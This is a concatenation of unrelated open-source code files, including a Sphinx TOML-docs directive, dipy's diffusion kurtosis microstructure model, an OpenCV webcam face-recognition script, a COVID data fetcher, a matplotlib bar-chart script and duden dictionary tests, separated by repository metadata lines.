def _new_toml_block(toml):
literal = nodes.literal_block(toml, toml)
literal['language'] = 'toml'
return literal
def run(self): # type: () -> List[nodes.Node]
location = self.state_machine.get_source_and_line(self.lineno)
cfg_path = self.arguments[0]
config_cls = self._get_class(cfg_path, location)
if config_cls is None:
return []
config = config_cls('')
result = []
if 'no-docstrings' in self.options:
toml = config.export_toml()
result.append(self._new_toml_block(toml))
else:
for docstring, toml in config.get_docblocks():
if docstring:
rst = StringList(docstring.split('\n'))
# Create a node.
node = nodes.option_string()
node.document = self.state.document
# Parse the rst.
self.state.nested_parse(rst, 0, node)
result.append(node)
if toml:
result.append(self._new_toml_block(toml))
return result
def setup(app): # type: (Sphinx) -> None
app.add_directive('cyradoc', CyradocDirective)
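# A minimal reStructuredText usage sketch (the module/class path is hypothetical):
# the directive takes one dotted "<module>.<ConfigClass>" argument pointing at a
# cyra.Config subclass, plus an optional no-docstrings flag.
#
#   .. cyradoc:: mypackage.config.MyConfig
#
#   .. cyradoc:: mypackage.config.MyConfig
#      :no-docstrings: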
| 1.96875 | 2 |
dipy/reconst/dki_micro.py | nasimanousheh/dipy | 8 | 12786467 | <reponame>nasimanousheh/dipy<filename>dipy/reconst/dki_micro.py
#!/usr/bin/python
""" Classes and functions for fitting the DKI-based microstructural model """
from __future__ import division, print_function, absolute_import
import numpy as np
from dipy.reconst.dti import (lower_triangular, from_lower_triangular,
decompose_tensor, trace, mean_diffusivity,
radial_diffusivity, axial_diffusivity,
MIN_POSITIVE_SIGNAL)
from dipy.reconst.dki import (split_dki_param, _positive_evals,
directional_kurtosis,
directional_diffusion, kurtosis_maximum,
DiffusionKurtosisModel, DiffusionKurtosisFit)
from dipy.reconst.dti import design_matrix as dti_design_matrix
from dipy.core.ndindex import ndindex
from dipy.reconst.vec_val_sum import vec_val_vect
from dipy.data import get_sphere
import dipy.core.sphere as dps
def axonal_water_fraction(dki_params, sphere='repulsion100', gtol=1e-2,
mask=None):
""" Computes the axonal water fraction from DKI [1]_.
Parameters
----------
dki_params : ndarray (x, y, z, 27) or (n, 27)
All parameters estimated from the diffusion kurtosis model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the first,
second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
sphere : Sphere class instance, optional
The sphere providing sample directions for the initial search of the
maximal value of kurtosis.
gtol : float, optional
This input is to refine kurtosis maxima under the precision of the
directions sampled on the sphere class instance. The gradient of the
convergence procedure must be less than gtol before successful
termination. If gtol is None, fiber direction is directly taken from
the initial sampled directions of the given sphere object
mask : ndarray
A boolean array used to mark the coordinates in the data that should be
analyzed that has the shape dki_params.shape[:-1]
Returns
--------
awf : ndarray (x, y, z) or (n)
Axonal Water Fraction
References
----------
.. [1] <NAME>, <NAME>, <NAME>, 2011. White matter
characterization with diffusional kurtosis imaging.
Neuroimage 58(1):177-88. doi: 10.1016/j.neuroimage.2011.06.006
"""
kt_max = kurtosis_maximum(dki_params, sphere=sphere, gtol=gtol, mask=mask)
awf = kt_max / (kt_max + 3)
return awf
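# A small worked example of the relation above (hypothetical kurtosis maximum):
# kt_max = 1.5 gives awf = 1.5 / (1.5 + 3) ~= 0.33, i.e. roughly a third of the
# voxel water is attributed to the restricted (axonal) compartment.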
def diffusion_components(dki_params, sphere='repulsion100', awf=None,
mask=None):
""" Extracts the restricted and hindered diffusion tensors of well aligned
fibers from diffusion kurtosis imaging parameters [1]_.
Parameters
----------
dki_params : ndarray (x, y, z, 27) or (n, 27)
All parameters estimated from the diffusion kurtosis model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the first,
second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
sphere : Sphere class instance, optional
The sphere providing sample directions to sample the restricted and
hindered cellular diffusion tensors. For more details see Fieremans
et al., 2011.
awf : ndarray (optional)
Array containing values of the axonal water fraction that has the shape
dki_params.shape[:-1]. If not given this will be automatically computed
    using :func:`axonal_water_fraction` with the function's default precision.
mask : ndarray (optional)
A boolean array used to mark the coordinates in the data that should be
analyzed that has the shape dki_params.shape[:-1]
Returns
--------
edt : ndarray (x, y, z, 6) or (n, 6)
Parameters of the hindered diffusion tensor.
idt : ndarray (x, y, z, 6) or (n, 6)
Parameters of the restricted diffusion tensor.
Note
----
In the original article of DKI microstructural model [1]_, the hindered and
    restricted tensors were defined as the intra-cellular and extra-cellular
diffusion compartments respectively.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, 2011. White matter
characterization with diffusional kurtosis imaging.
Neuroimage 58(1):177-88. doi: 10.1016/j.neuroimage.2011.06.006
"""
shape = dki_params.shape[:-1]
# load gradient directions
if not isinstance(sphere, dps.Sphere):
sphere = get_sphere(sphere)
# select voxels where to apply the single fiber model
if mask is None:
mask = np.ones(shape, dtype='bool')
else:
if mask.shape != shape:
raise ValueError("Mask is not the same shape as dki_params.")
else:
mask = np.array(mask, dtype=bool, copy=False)
# check or compute awf values
if awf is None:
awf = axonal_water_fraction(dki_params, sphere=sphere, mask=mask)
else:
if awf.shape != shape:
raise ValueError("awf array is not the same shape as dki_params.")
# Initialize hindered and restricted diffusion tensors
edt_all = np.zeros(shape + (6,))
idt_all = np.zeros(shape + (6,))
    # Generate matrix that converts apparent diffusion coefficients to tensors
B = np.zeros((sphere.x.size, 6))
B[:, 0] = sphere.x * sphere.x # Bxx
B[:, 1] = sphere.x * sphere.y * 2. # Bxy
B[:, 2] = sphere.y * sphere.y # Byy
B[:, 3] = sphere.x * sphere.z * 2. # Bxz
B[:, 4] = sphere.y * sphere.z * 2. # Byz
B[:, 5] = sphere.z * sphere.z # Bzz
pinvB = np.linalg.pinv(B)
# Compute hindered and restricted diffusion tensors for all voxels
evals, evecs, kt = split_dki_param(dki_params)
dt = lower_triangular(vec_val_vect(evecs, evals))
md = mean_diffusivity(evals)
index = ndindex(mask.shape)
for idx in index:
if not mask[idx]:
continue
# sample apparent diffusion and kurtosis values
di = directional_diffusion(dt[idx], sphere.vertices)
ki = directional_kurtosis(dt[idx], md[idx], kt[idx], sphere.vertices,
adc=di, min_kurtosis=0)
edi = di * (1 + np.sqrt(ki * awf[idx] / (3.0 - 3.0 * awf[idx])))
edt = np.dot(pinvB, edi)
edt_all[idx] = edt
# We only move on if there is an axonal water fraction.
# Otherwise, remaining params are already zero, so move on
if awf[idx] == 0:
continue
# Convert apparent diffusion and kurtosis values to apparent diffusion
# values of the hindered and restricted diffusion
idi = di * (1 - np.sqrt(ki * (1.0 - awf[idx]) / (3.0 * awf[idx])))
# generate hindered and restricted diffusion tensors
idt = np.dot(pinvB, idi)
idt_all[idx] = idt
return edt_all, idt_all
def dkimicro_prediction(params, gtab, S0=1):
r""" Signal prediction given the DKI microstructure model parameters.
Parameters
----------
params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis microstructure model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
gtab : a GradientTable class instance
The gradient table for this prediction
S0 : float or ndarray
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Returns
--------
S : (..., N) ndarray
Simulated signal based on the DKI microstructure model
Notes
-----
1) The predicted signal is given by:
$S(\theta, b) = S_0 * [f * e^{-b ADC_{r}} + (1-f) * e^{-b ADC_{h}]$, where
$ ADC_{r} and ADC_{h} are the apparent diffusion coefficients of the
diffusion hindered and restricted compartment for a given direction
$\theta$, $b$ is the b value provided in the GradientTable input for that
direction, $f$ is the volume fraction of the restricted diffusion
compartment (also known as the axonal water fraction).
2) In the original article of DKI microstructural model [1]_, the hindered
    and restricted tensors were defined as the intra-cellular and
extra-cellular diffusion compartments respectively.
"""
# Initialize pred_sig
pred_sig = np.zeros(params.shape[:-1] + (gtab.bvals.shape[0],))
# Define dti design matrix and region to process
D = dti_design_matrix(gtab)
evals = params[..., :3]
mask = _positive_evals(evals[..., 0], evals[..., 1], evals[..., 2])
# Prepare parameters
f = params[..., 27]
adce = params[..., 28:34]
adci = params[..., 34:40]
if isinstance(S0, np.ndarray):
S0_vol = S0 * np.ones(params.shape[:-1])
else:
S0_vol = S0
# Process pred_sig for all data voxels
index = ndindex(evals.shape[:-1])
for v in index:
if mask[v]:
pred_sig[v] = (1. - f[v]) * np.exp(np.dot(D[:, :6], adce[v])) + \
f[v] * np.exp(np.dot(D[:, :6], adci[v]))
return pred_sig * S0_vol
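# A small worked example of the bi-exponential prediction implemented above
# (hypothetical values, not from the original module): with f = 0.3,
# b = 1000 s/mm^2, ADC_r = 0.5e-3 mm^2/s and ADC_h = 1.5e-3 mm^2/s for a given
# direction,
#   S / S0 = 0.3 * exp(-0.5) + 0.7 * exp(-1.5) ~= 0.18 + 0.16 ~= 0.34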
def tortuosity(hindered_ad, hindered_rd):
""" Computes the tortuosity of the hindered diffusion compartment given
its axial and radial diffusivities
Parameters
----------
hindered_ad: ndarray
Array containing the values of the hindered axial diffusivity.
hindered_rd: ndarray
Array containing the values of the hindered radial diffusivity.
Return
------
Tortuosity of the hindered diffusion compartment
"""
if not isinstance(hindered_rd, np.ndarray):
hindered_rd = np.array(hindered_rd)
if not isinstance(hindered_ad, np.ndarray):
hindered_ad = np.array(hindered_ad)
tortuosity = np.zeros(hindered_rd.shape)
# mask to avoid divisions by zero
mask = hindered_rd > 0
# Check single voxel cases. For numpy versions more recent than 1.7,
# this if else condition is not required since single voxel can be
# processed using the same line of code of multi-voxel
if hindered_rd.size == 1:
if mask:
tortuosity = hindered_ad / hindered_rd
else:
tortuosity[mask] = hindered_ad[mask] / hindered_rd[mask]
return tortuosity
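# A small usage sketch (hypothetical diffusivities): with a hindered axial
# diffusivity of 1.8e-3 mm^2/s and a hindered radial diffusivity of
# 0.6e-3 mm^2/s, the tortuosity is about 3.
#
#   >>> tortuosity(np.array([1.8e-3]), np.array([0.6e-3]))   # -> ~array([3.])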
def _compartments_eigenvalues(cdt):
""" Helper function that computes the eigenvalues of a tissue sub
compartment given its individual diffusion tensor
Parameters
----------
cdt : ndarray (..., 6)
Diffusion tensors elements of the tissue compartment stored in lower
triangular order.
Returns
-------
    eval : ndarray (..., 3)
Eigenvalues of the tissue compartment
"""
evals, evecs = decompose_tensor(from_lower_triangular(cdt))
return evals
class KurtosisMicrostructureModel(DiffusionKurtosisModel):
""" Class for the Diffusion Kurtosis Microstructural Model
"""
def __init__(self, gtab, fit_method="WLS", *args, **kwargs):
""" Initialize a KurtosisMicrostrutureModel class instance [1]_.
Parameters
----------
gtab : GradientTable class instance
fit_method : str or callable
str can be one of the following:
'OLS' or 'ULLS' to fit the diffusion tensor and kurtosis tensor
using the ordinary linear least squares solution
dki.ols_fit_dki
'WLS' or 'UWLLS' to fit the diffusion tensor and kurtosis tensor
using the ordinary linear least squares solution
dki.wls_fit_dki
callable has to have the signature:
fit_method(design_matrix, data, *args, **kwargs)
args, kwargs : arguments and key-word arguments passed to the
fit_method. See dki.ols_fit_dki, dki.wls_fit_dki for details
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
DiffusionKurtosisModel.__init__(self, gtab, fit_method="WLS", *args,
**kwargs)
def fit(self, data, mask=None, sphere='repulsion100', gtol=1e-2,
awf_only=False):
""" Fit method of the Diffusion Kurtosis Microstructural Model
Parameters
----------
data : array
An 4D matrix containing the diffusion-weighted data.
mask : array
A boolean array used to mark the coordinates in the data that
should be analyzed that has the shape data.shape[-1]
sphere : Sphere class instance, optional
The sphere providing sample directions for the initial search of
the maximal value of kurtosis.
gtol : float, optional
This input is to refine kurtosis maxima under the precision of the
directions sampled on the sphere class instance. The gradient of
the convergence procedure must be less than gtol before successful
termination. If gtol is None, fiber direction is directly taken
from the initial sampled directions of the given sphere object
        awf_only : bool, optional
If set to true only the axonal volume fraction is computed from
the kurtosis tensor. Default = False
"""
if mask is not None:
# Check for valid shape of the mask
if mask.shape != data.shape[:-1]:
raise ValueError("Mask is not the same shape as data.")
mask = np.array(mask, dtype=bool, copy=False)
data_in_mask = np.reshape(data[mask], (-1, data.shape[-1]))
if self.min_signal is None:
self.min_signal = MIN_POSITIVE_SIGNAL
data_in_mask = np.maximum(data_in_mask, self.min_signal)
# DKI fit
dki_params = self.fit_method(self.design_matrix, data_in_mask,
*self.args, **self.kwargs)
# Computing awf
awf = axonal_water_fraction(dki_params, sphere=sphere, gtol=gtol)
if awf_only:
params_all_mask = np.concatenate((dki_params, np.array([awf]).T),
axis=-1)
else:
# Computing the hindered and restricted diffusion tensors
hdt, rdt = diffusion_components(dki_params, sphere=sphere,
awf=awf)
params_all_mask = np.concatenate((dki_params, np.array([awf]).T,
hdt, rdt), axis=-1)
if mask is None:
out_shape = data.shape[:-1] + (-1,)
params = params_all_mask.reshape(out_shape)
else:
params = np.zeros(data.shape[:-1] + (params_all_mask.shape[-1],))
params[mask, :] = params_all_mask
return KurtosisMicrostructuralFit(self, params)
def predict(self, params, S0=1.):
""" Predict a signal for the DKI microstructural model class instance
given parameters.
Parameters
----------
params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis
microstructural model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
S0 : float or ndarray (optional)
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Note
-----
In the original article of DKI microstructural model [1]_, the hindered
        and restricted tensors were defined as the intra-cellular and
extra-cellular diffusion compartments respectively.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return dkimicro_prediction(params, self.gtab, S0)
class KurtosisMicrostructuralFit(DiffusionKurtosisFit):
""" Class for fitting the Diffusion Kurtosis Microstructural Model """
def __init__(self, model, model_params):
""" Initialize a KurtosisMicrostructural Fit class instance.
Parameters
----------
model : DiffusionKurtosisModel Class instance
Class instance containing the Diffusion Kurtosis Model for the fit
model_params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis
microstructural model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
Note
-----
In the original article of DKI microstructural model [1]_, the hindered
        and restricted tensors were defined as the intra-cellular and
extra-cellular diffusion compartments respectively.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
DiffusionKurtosisFit.__init__(self, model, model_params)
@property
def awf(self):
""" Returns the volume fraction of the restricted diffusion compartment
also known as axonal water fraction.
Note
----
        The volume fraction of the restricted diffusion compartment can be seen
as the volume fraction of the intra-cellular compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return self.model_params[..., 27]
@property
def restricted_evals(self):
""" Returns the eigenvalues of the restricted diffusion compartment.
Note
-----
        The restricted diffusion tensor can be seen as the tissue's
intra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
self._is_awfonly()
return _compartments_eigenvalues(self.model_params[..., 34:40])
@property
def hindered_evals(self):
""" Returns the eigenvalues of the hindered diffusion compartment.
Note
-----
        The hindered diffusion tensor can be seen as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
self._is_awfonly()
return _compartments_eigenvalues(self.model_params[..., 28:34])
@property
def axonal_diffusivity(self):
""" Returns the axonal diffusivity defined as the restricted diffusion
tensor trace [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return trace(self.restricted_evals)
@property
def hindered_ad(self):
""" Returns the axial diffusivity of the hindered compartment.
Note
-----
        The hindered diffusion tensor can be seen as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return axial_diffusivity(self.hindered_evals)
@property
def hindered_rd(self):
""" Returns the radial diffusivity of the hindered compartment.
Note
-----
        The hindered diffusion tensor can be seen as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return radial_diffusivity(self.hindered_evals)
@property
def tortuosity(self):
""" Returns the tortuosity of the hindered diffusion which is defined
by ADe / RDe, where ADe and RDe are the axial and radial diffusivities
of the hindered compartment [1]_.
Note
-----
        The hindered diffusion tensor can be seen as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return tortuosity(self.hindered_ad, self.hindered_rd)
def _is_awfonly(self):
""" To raise error if only the axonal water fraction was computed """
if self.model_params.shape[-1] < 39:
raise ValueError('Only the awf was processed! Rerun model fit '
'with input parameter awf_only set to False')
def predict(self, gtab, S0=1.):
r""" Given a DKI microstructural model fit, predict the signal on the
vertices of a gradient table
gtab : a GradientTable class instance
The gradient table for this prediction
S0 : float or ndarray (optional)
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Notes
-----
The predicted signal is given by:
$S(\theta, b) = S_0 * [f * e^{-b ADC_{r}} + (1-f) * e^{-b ADC_{h}]$,
where $ADC_{r}$ and $ADC_{h}$ are the apparent diffusion coefficients
of the diffusion hindered and restricted compartment for a given
direction $\theta$, $b$ is the b value provided in the GradientTable
input for that direction, $f$ is the volume fraction of the restricted
diffusion compartment (also known as the axonal water fraction).
"""
self._is_awfonly()
return dkimicro_prediction(self.model_params, gtab, S0)
| 2.671875 | 3 |
face_recognize.py | nadeengamage/face-recognition | 0 | 12786468 | import cv2, sys, os
import numpy as np
haar_file = 'haarcascade_frontalface_default.xml'
datasets = 'datasets'
print('Recognizing Face Please Be in sufficient Lights...')
(images, lables, names, id) = ([], [], {}, 0)
for (subdirs, dirs, files) in os.walk(datasets):
for subdir in dirs:
names[id] = subdir
subjectpath = os.path.join(datasets, subdir)
for filename in os.listdir(subjectpath):
path = subjectpath + '/' + filename
lable = id
images.append(cv2.imread(path, 0))
lables.append(int(lable))
id += 1
(width, height) = (130, 100)
(images, lables) = [np.array(lis) for lis in [images, lables]]
model = cv2.face.LBPHFaceRecognizer_create()
model.train(images, lables)
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(0)
while True:
(_, im) = webcam.read()
(_, im2) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
lower_blue = np.array([110,50,50])
upper_blue = np.array([130,255,255])
for (x, y, w, h) in faces:
cv2.rectangle(gray, (x, y), (x + w, y + h), (255, 0, 0), 2)
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y:y + h, x:x + w]
face_resize = cv2.resize(face, (width, height))
prediction = model.predict(face_resize)
cv2.rectangle(gray, (x, y), (x + w, y + h), (0, 255, 0), 3)
cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 3)
if prediction[1]<100:
cv2.putText(gray, 'The person of % s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
cv2.putText(im, 'The person of % s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
else:
cv2.putText(gray, 'Not Recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
cv2.putText(im, 'Not Recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
mask = cv2.inRange(hsv, lower_blue, upper_blue)
cv2.imshow('Window 1', im)
cv2.imshow('Window 2', im2)
cv2.imshow('Window 3', gray)
cv2.imshow('Window 4', mask)
key = cv2.waitKey(10)
if key == 27:
cv2.destroyAllWindows()
break
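# Expected layout of the 'datasets' folder, as implied by the training loop above
# (person and file names here are illustrative): one sub-directory per person,
# each holding that person's captured face images.
#
#   datasets/
#       alice/  1.png 2.png ...
#       bob/    1.png 2.png ...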
| 2.734375 | 3 |
autumn/tools/inputs/covid_au/fetch.py | monash-emu/AuTuMN | 14 | 12786469 | <filename>autumn/tools/inputs/covid_au/fetch.py
"""
This file imports Google mobility data and saves it to disk as a CSV.
"""
import os
import pandas as pd
from autumn.settings import INPUT_DATA_PATH
# From covid19data.com.au GitHub https://github.com/M3IT/COVID-19_Data
DATA_URL = "https://raw.githubusercontent.com/M3IT/COVID-19_Data/master/Data/COVID_AU_state_daily_change.csv"
COVID_AU_DIRPATH = os.path.join(INPUT_DATA_PATH, "covid_au")
COVID_AU_CSV_PATH = os.path.join(COVID_AU_DIRPATH, "COVID_AU_state_daily_change.csv")
YOUGOV_URL = "https://github.com/YouGov-Data/covid-19-tracker/raw/master/data/australia.zip"
COVID_AU_YOUGOV = os.path.join(COVID_AU_DIRPATH, "yougov_australia.csv")
COVID_LGA_CSV_PATH = os.path.join(COVID_AU_DIRPATH, "lga_test.csv")
MOBILITY_DIRPATH = os.path.join(INPUT_DATA_PATH, "mobility")
MOBILITY_LGA_PATH = os.path.join(
MOBILITY_DIRPATH, "LGA to Cluster mapping dictionary with proportions.csv"
)
COVID_VAC_COV_CSV = os.path.join(COVID_AU_DIRPATH, "vac_cov.csv")
COVID_VIDA_VAC_CSV = os.path.join(COVID_AU_DIRPATH, "vida_vac.secret.csv")
COVID_VIDA_POP_CSV = os.path.join(COVID_AU_DIRPATH, "vida_pop.csv")
CLUSTER_MAP = {
1: "NORTH_METRO",
2: "SOUTH_EAST_METRO",
3: "SOUTH_METRO",
4: "WEST_METRO",
5: "BARWON_SOUTH_WEST",
6: "GIPPSLAND",
7: "GRAMPIANS",
8: "HUME",
9: "LODDON_MALLEE",
0: "VIC",
}
def fetch_covid_au_data():
pd.read_csv(DATA_URL).to_csv(COVID_AU_CSV_PATH)
pd.read_csv(YOUGOV_URL).to_csv(COVID_AU_YOUGOV)
| 2.703125 | 3 |
diabetesmanager/__init__.py | diabetes-manager/data-science | 0 | 12786470 | <gh_stars>0
"""Entry point for Diabetes Manager flask application."""
from .app import create_app
APP = create_app()
| 1.03125 | 1 |
draw_bar.py | IndexFziQ/nn4nlp-concepts | 440 | 12786471 | # import libraries
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import matplotlib.pyplot as plt
import argparse
from collections import defaultdict
#%matplotlib inline
# set font
plt.rcParams['font.family'] = 'sans-serif'
plt.rcParams['font.sans-serif'] = 'Helvetica'
# set the style of the axes and the text color
plt.rcParams['axes.edgecolor']='#333F4B'
plt.rcParams['axes.linewidth']=0.8
plt.rcParams['xtick.color']='#333F4B'
plt.rcParams['ytick.color']='#333F4B'
plt.rcParams['text.color']='#333F4B'
parser = argparse.ArgumentParser(description='Draw Bar')
parser.add_argument('--tsv', default='input.tsv', help='input file separted by \'\\t\' ')
parser.add_argument('--fig', default='out.png', help='the output figure')
parser.add_argument('--title', default='Concept Count in All Papers', help='the title of the graph')
parser.add_argument('--colored_concepts', default=None, nargs='+',
help='An interleaved list of filenames containing concept tags (e.g. first.txt red second.txt purple)')
args = parser.parse_args()
concept_colors = defaultdict(lambda: '#007ACC')
if args.colored_concepts:
for i in range(0, len(args.colored_concepts), 2):
print(f"opening {args.colored_concepts[i]} as {args.colored_concepts[i+1]}")
with open(args.colored_concepts[i], 'r') as f:
for line in f:
line = line.strip()
concept_colors[line] = args.colored_concepts[i+1]
print(f'concept_colors[{line}] = {args.colored_concepts[i+1]}')
tsv_file = args.tsv
fig_file = args.fig
fin = open(tsv_file,"r")
cpt_list = []
val_list = []
for line in fin:
line = line.strip()
cpt, val = line.split("\t")
val_list.append(int(val))
cpt_list.append(cpt)
fin.close()
percentages = pd.Series(val_list,
index=cpt_list)
df = pd.DataFrame({'percentage' : percentages})
df = df.sort_values(by='percentage')
color_list = [concept_colors[x] for x in df.index]
# we first need a numeric placeholder for the y axis
my_range=list(range(1,len(df.index)+1))
fig, ax = plt.subplots(figsize=(10,25))
# create lines and dots for each bar
plt.hlines(y=my_range, xmin=0, xmax=df['percentage'], colors=color_list, alpha=0.5, linewidth=5)
# plt.plot(df['percentage'], my_range, "o", markersize=5, colors=color_list, alpha=0.6)
# set labels
ax.set_xlabel(args.title, fontsize=15, fontweight='black', color = '#333F4B')
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
#ax.set_ylabel('')
# set axis
ax.tick_params(axis='both', which='major', labelsize=12)
plt.yticks(my_range, df.index)
# add an horizonal label for the y axis
#fig.text(-0.23, 0.86, 'Concept Coverage (Fulltext)', fontsize=15, fontweight='black', color = '#333F4B')
# change the style of the axis spines
ax.spines['bottom'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['top'].set_smart_bounds(True)
'''
# set the spines position
ax.spines['bottom'].set_position(('axes', -0.04))
ax.spines['left'].set_position(('axes', 0.015))
'''
plt.savefig(fig_file, dpi=300, bbox_inches='tight')
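# A minimal sketch of the expected inputs (concept names are hypothetical). The
# --tsv file holds one "<concept>\t<count>" line per concept, and each file given
# to --colored_concepts lists one concept tag per line, paired with its color:
#
#   input.tsv:
#       word-embeddings\t250
#       attention\t180
#
#   python draw_bar.py --tsv input.tsv --fig out.png \
#       --colored_concepts core-concepts.txt red new-concepts.txt purple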
| 2.765625 | 3 |
tests/test_online_attributes.py | anetschka/duden | 0 | 12786472 | <filename>tests/test_online_attributes.py
# -*- coding: utf-8 -*-
"""
Test if words currently available online parse as expected
"""
import os
from collections import namedtuple
import pytest
import yaml
from duden.search import get
TEST_DATA_DIR = 'tests/test_data'
WordTestRecord = namedtuple('WordTestRecord', ["parsed_word", "expected_dict"])
def generate_word_data():
"""
Download actual words from duden corresponding to test words from `TEST_DATA_DIR`
"""
data = []
for filename in os.listdir(TEST_DATA_DIR):
full_path = os.path.join(TEST_DATA_DIR, filename)
# read only yaml files
if not filename.endswith('.yaml'):
continue
# store real and expected result
with open(full_path, 'r') as f:
expected_dict = yaml.load(f, Loader=yaml.SafeLoader)
parsed_word = get(expected_dict['urlname'])
record = WordTestRecord(parsed_word, expected_dict)
data.append(record)
return data
# set up test parameters matrix
word_data = generate_word_data()
basic_attributes = [
'title', 'name', 'article', 'part_of_speech', 'frequency', 'usage',
'word_separation', 'synonyms', 'origin', 'words_before', 'words_after'
]
word_param = pytest.mark.parametrize("parsed_word,expected_dict", word_data)
attribute_param = pytest.mark.parametrize("attribute", basic_attributes)
@word_param
@attribute_param
def test_basic_attributes(parsed_word, expected_dict, attribute):
"""Test basic word attributes"""
assert getattr(parsed_word, attribute) == expected_dict[attribute]
@word_param
def test_meaning_overview(parsed_word, expected_dict):
"""Test meaning overview attribute"""
assert parsed_word.meaning_overview == expected_dict['meaning_overview']
@word_param
def test_word_compounds(parsed_word, expected_dict):
"""Test word compounds attribute"""
parsed = parsed_word.compounds
expected = expected_dict['compounds']
if parsed == expected == None: # noqa
return
assert parsed.keys() == expected.keys()
if 'substantive' in expected:
assert set(parsed['substantive']) == set(expected['substantive'])
if 'verben' in expected:
assert set(parsed['verben']) == set(expected['verben'])
if 'adjektive' in expected:
assert set(parsed['adjektive']) == set(expected['adjektive'])
@word_param
def test_word_grammar(parsed_word, expected_dict):
"""Test word grammar"""
expected_grammar = expected_dict['grammar_raw']
if expected_grammar is not None:
expected_grammar = [(set(tags), string)
for tags, string in expected_grammar]
assert parsed_word.grammar_raw == expected_grammar
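# A minimal sketch of one tests/test_data YAML file (values are hypothetical;
# every key queried above must be present, with null where the word has no data):
#
#   urlname: Liebe
#   title: Liebe, die
#   name: Liebe
#   article: die
#   part_of_speech: Substantiv, feminin
#   frequency: 5
#   usage: null
#   word_separation:
#     - Lie
#     - be
#   synonyms: null
#   origin: null
#   words_before: null
#   words_after: null
#   meaning_overview: null
#   compounds: null
#   grammar_raw: null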
| 2.78125 | 3 |
runner.py | erensezener/aima-based-irl | 12 | 12786473 | """
Author: <NAME> (<EMAIL>)
Date: April 4, 2014
Description: Runs the BIRL algorithm multiple times.
Status: Works correctly.
Dependencies:
Known bugs: -
"""
